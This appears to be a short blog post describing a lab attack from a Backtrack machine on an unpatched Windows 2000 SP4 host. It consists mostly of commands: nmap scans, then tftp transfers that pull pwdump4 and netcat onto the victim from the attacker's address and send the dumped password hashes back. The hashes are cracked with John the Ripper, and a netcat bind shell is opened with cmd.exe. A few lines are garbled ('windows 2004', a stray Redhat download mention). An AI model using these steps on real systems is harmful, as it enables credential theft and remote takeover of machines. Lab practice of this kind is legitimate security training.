this old version of linux can be download at
Download Redhat 6.2 here
Installing and Securing IIS Servers
The other machine is Backtrack that already installed into my hard disk for attacking purposes.
By default, windows 2000 sp4 is vulnerable to lsass exploit. So, make sure you patch your machine accordingly. In this lab, i won't patch it to show how the attack can be done.
Windows SP4 - 10.21.11.81
Backtrack (Attacker - 10.21.11.84)
On Backtrack, scan windows 2004 sp4 using nmap
nmap -sT -O 10.21.11.81
nmap -sV 10.21.11.81 -p 23,25,80
nmap -sU 10.21.11.81
cd /pentest/password/dictionaries
gunzip -c wordlist.txt.gz > /tmp/wordlist.txt
exploit the machine...n get the shell.
From the windows 2004, run
tftp -i 10.21.11.84 get pwdump4.exe
tftp -i 10.21.11.84 get pwdump4.dll
tftp -i 10.21.11.84 get nc.exe
pwdump4 /l /o:pwdump4.txt
tftp 10.21.11.84 put pwdump4.txt
From Backtrack,
cat pwdump4.txt
john -w:wordlist.txt pwdump4.txt
john --show pwdump4.txt
john -w:wordlist.txt -f:NT pwdump4.txt
From Windows,
nc -L -p 2111 -e cmd.exe
telnet 10.21.11.81 2111
whoami
that's it, and GAME OVER
No comments:
Post a Comment